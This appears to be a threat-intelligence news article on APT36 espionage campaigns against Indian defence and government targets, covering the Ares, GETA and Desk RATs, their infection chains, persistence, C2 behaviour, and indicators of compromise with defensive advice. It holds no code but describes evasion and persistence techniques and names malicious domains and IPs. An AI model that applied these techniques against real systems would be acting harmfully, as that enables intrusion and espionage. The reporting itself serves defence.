The advanced persistent threat (APT) group known as APT36, or Transparent Tribe, has intensified its espionage operations targeting Indian defense and government entities. Recent reports from Aryaka Threat Research Labs detail the group’s use of a new arsenal of cross-platform malware, including sophisticated tools specifically designed for Linux systems, to maintain persistent access and exfiltrate sensitive data.
These malicious campaigns leverage spear-phishing as an initial entry vector, distributing compromised files such as LNK shortcuts, HTA documents, ELF binaries, and PPAM attachments. The attackers have recently been observed hosting their malicious payloads on trusted Indian domains, a tactic aimed at increasing the legitimacy of their phishing attempts. This strategic approach allows APT36 to infiltrate both Windows and Linux environments, highlighting a significant evolution in their operational capabilities and targeting scope.
APT36 Escalates Attacks with New Linux Malware
APT36 and associated actors, including the SideCopy group, are employing a multi-pronged approach to compromise systems. Their recent activities, documented over the past month, have focused intensely on Indian strategic sectors. By utilizing established Indian domains, the threat actors aim to bypass security measures and gain initial access through carefully crafted phishing lures.
The malware deployed by APT36 demonstrates a focus on stealth and persistence. Tactics include in-memory execution to avoid leaving traces on disk, encrypted command and control (C2) communication to obscure malicious traffic, and the implementation of systemd persistence mechanisms on Linux systems. These techniques are designed to ensure long-term, undetected access to compromised networks.
A key component of the Linux attack chain involves a UPX-packed, Go-based ELF downloader. Upon execution, this downloader creates a hidden directory, specifically ~/.local, to store its payload. It then retrieves three critical files from the compromised domain, innlive.in: gkt3.1, a PyInstaller-packed Ares RAT ELF binary; gkt3.sh, a shell script responsible for establishing systemd user service persistence; and a decoy PDF file, likely intended to mask the malicious activity.
The systemd service automatically ensures that the gkt3.1 binary, the Ares RAT, is executed upon user login. This persistence mechanism guarantees that the malware restarts automatically even after a system reboot, providing APT36 with continuous access.
Ares RAT: A Deep Dive into Linux Espionage Tool
The Ares RAT, written in Python, is at the core of the Linux-based attacks. Upon initialization, it captures essential system information, including the operating system platform, hostname, username, and generates a unique identifier for the compromised machine. A function called listall() is then executed, which recursively enumerates files and directories within the user’s home directory. The gathered file information is saved to a temporary file, /tmp/list.txt, before being exfiltrated to the attacker’s C2 server via multipart HTTP requests.
An infinite loop governs the RAT’s operation, allowing it to poll a designated `/hello` endpoint at regular intervals to check for incoming commands. These commands include functionalities such as changing the working directory (`cd`), uploading or downloading files, capturing screenshots, executing arbitrary Python code, establishing further persistence, or exiting the program.
Parallel Windows Attacks and Evolving Malware
Meanwhile, APT36 continues to conduct parallel attacks against Windows systems, employing different yet equally sophisticated tools. These campaigns often begin with LNK shortcuts that trigger mshta.exe, a legitimate Windows utility. This utility then fetches JavaScript code from compromised websites, such as sifi.co.in. The execution of this JavaScript leads to XAML deserialization and in-memory .NET deserialization, a technique that allows for the loading and execution of malicious code without writing it directly to disk.
This process ultimately deploys the GETA RAT, a .NET-based malware. GETA RAT communicates with its C2 servers over TCP, utilizing AES encryption on ports like 8621. Its communication pattern includes regular beacons and heartbeats, typically randomized between 30 and 60 seconds, to maintain the connection. The RAT supports commands for process termination (`pkill`), shell access, file operations, and remote desktop functionality. For persistence on Windows, it leverages the Startup folder, registry run keys, and includes checks to evade detection by security solutions like Kaspersky and Quick Heal.
A further component of the Windows attack infrastructure is the Desk RAT, which is often delivered via PPAM lures, such as fake “Project Vijayak BRO Updates.” This RAT is written in Go and auto-executes VBA macros embedded within the lure files. These macros download ZIP archives from domains like defenceindia.siteteamindia. The Desk RAT is designed to gather system information, including CPU and memory utilization, and system uptime. It establishes persistence by creating a registry run key within the %TEMP% directory and identifies the system’s public IP address through services like ipify.org or by sending UDP packets to Google’s DNS server (8.8.8.8:80). It then enriches this IP information with geographical data from ip-api.com.
The Desk RAT communicates using WebSockets on the `/ws` endpoint, sending client information and heartbeats that include system telemetry. Commands received through this channel can include browsing files and executing uploaded files. The RAT’s communication follows the RFC 6455 WebSocket handshake and maintains approximately 30-second heartbeats.
Technical analysis of the malware reveals specific timing and beaconing patterns. For instance, Linux droppers exhibit fixed timing intervals, and the Ares RAT uses predictable /report uploads to its C2. The GETA RAT demonstrates packet gaps of approximately 0.24 seconds for screenshots, and its commands, after encryption, are fixed at 16 bytes. These detailed observations, provided by Aryaka Threat Research Labs, are crucial for threat detection and incident response.
Indicators of Compromise (IOCs) for these campaigns include specific IP addresses such as 65.109.190.120 and 2.56.10.86, as well as file hashes like d33ad6ed76cdd0b036af466d69a6ff50 for the Desk RAT. Organizations are advised to block domains like innlive.in and sifi.co.in. Monitoring for suspicious `mshta.exe` activity, unusual systemd service installations, and unexpected WebSocket upgrades is also recommended.
Effective defense strategies include employing DNS and Secure Web Gateway (SWG) solutions to mitigate phishing attempts, and utilizing Intrusion Detection/Prevention Systems (IDS/IPS) to identify beaconing traffic and anomalies in encrypted C2 communications. Aryaka recommends a Unified SASE (Secure Access Service Edge) approach, incorporating Next-Generation Firewall (NGFW) capabilities, antivirus, and deep traffic inspection to significantly reduce attacker dwell time within compromised networks.
The ongoing evolution of APT36’s toolkit, particularly the expansion to cross-platform malware like the Ares RAT for Linux, signals a more sophisticated and broader threat landscape. Organizations within the defense and government sectors should remain vigilant and continuously update their security postures to counter these persistent and adapting threats.